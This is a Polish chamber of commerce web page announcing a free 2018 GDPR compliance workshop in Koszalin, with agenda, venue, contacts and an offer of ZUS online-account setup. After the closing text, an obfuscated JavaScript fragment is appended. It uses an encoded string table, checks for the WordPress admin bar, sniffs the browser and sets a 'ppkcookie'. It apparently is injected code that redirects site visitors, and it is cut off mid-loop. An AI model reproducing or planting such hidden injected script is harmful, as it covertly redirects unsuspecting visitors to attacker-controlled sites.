Zmiany w RODO – warsztaty dla przedsiębiorców | Północna Izba Gospodarcza w Koszalinie
 
 
Dzięki temu szkoleniu dowiecie się Państwo, jakie zmiany czekają przedsiębiorców i jak się na nie praktycznie przygotować.
Jak należy dostosować organizację do nowych przepisów o ochronie danych osobowych i od czego zacząć proces wdrożeniowy? 
Jak wykonać analizę ryzyka zgodnie przepisami RODO? Jakie wyzwania są stawiane przed administratorem danych osobowych oraz inspektorem ochrony danych (IOD)? 
Co zmieni się dla dotychczasowych administratorów bezpieczeństwa informacji (ABI)?
Dowiecie się również jakie są założenia projektu nowej ustawy o ochronie danych osobowych oraz pierwszych wytycznych do przepisów RODO.
 
Termin warsztatów: 6.03.2018
Godzina: 10:00 – 16:00
Miejsce: City Box Koszalin, Rynek Staromiejski 14
 
 
Warsztaty poprowadzi adwokat Michał Skwira www.skwira.eu
 
Plan warsztatów
1.
I. Planowanie procesu wdrożenia RODO/GDPR.
II. Rola audytu w procesie wdrożenia RODO/GDPR.
III. Rodzaje audytów na gruncie RODO/GDPR.
 
2.
I. Zasady audytowania.
II. Przeprowadzanie audytu.
 
3.
I. Zapoznanie z podstawowymi pojęciami i kryteriami procesu szacowania ryzyka.
II. Zabezpieczenia minimalizujące ryzyko według RODO/GDPR
 
4.
I. Przygotowanie planu postępowania z ryzykiem.
• obniżanie ryzyka,
• redukcja ryzyka,
• uniknięcie ryzyka,
• transfer ryzyka.

Dla wszystkich uczestników Północna Izba Gospodarcza w Koszalinie zapewnia serwis kawowy oraz lunch.

Zapraszamy na bezpłatne warsztaty dla wszystkich firm zrzeszonych w Północnej Izbie Gospodarczej.
Jeżeli nie jesteście Państwo członkiem zapraszamy do wypełnienia deklaracji przystąpienia. Wszystkie informacje dostępne są pod adresem www.pig.koszalin.pl/jak-przystapic/

Jeżeli chcą Państwo uczestniczyć w warsztatach, bez kwestii formalnych prosimy o kontakt z biurem Północnej Izby Gospodarczej w Koszalinie 943411083 lub 537184630 oraz mailowo  koszalin@izba.info 

Potwierdzenie obecności prosimy wysyłać na adres koszalin@izba.info lub telefonicznie do naszego biura. Ilość miejsc ograniczona, decyduje kolejność zgłoszeń.

Jeżeli nie odpowiadają Państwu ustalone godziny, bardzo prosimy o informację.

Więcej informacji na https://www.facebook.com/events/185994825491820/

Wychodząc na przeciw potrzebą przedsiębiorców, w casie przerwy, będzie możliwość założenia profilu PUE, przez pracowników koszalińskiego ZUS-u.

Platforma Usług Elektronicznych (PUE) to zestaw nowoczesnych usług umożliwiający załatwianie spraw przez Internet bez wychodzenia z domu.

Profil PUE umożliwia  dostęp do zwolnień lekarskich płatnikowi  i ubezpieczonemu  a także kontakt z ZUS. Dzięki  profilowi można sprawdzić swoje dane zapisane na indywidualnym koncie, zarezerwować wizytę w placówce ZUS, śledzić stan spraw, złożyć dokumenty  oraz wnioski, a także uzyskać odpowiedź na pytanie zadane „Wirtualnemu Doradcy”.

Zapraszamy!
 

 

 

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m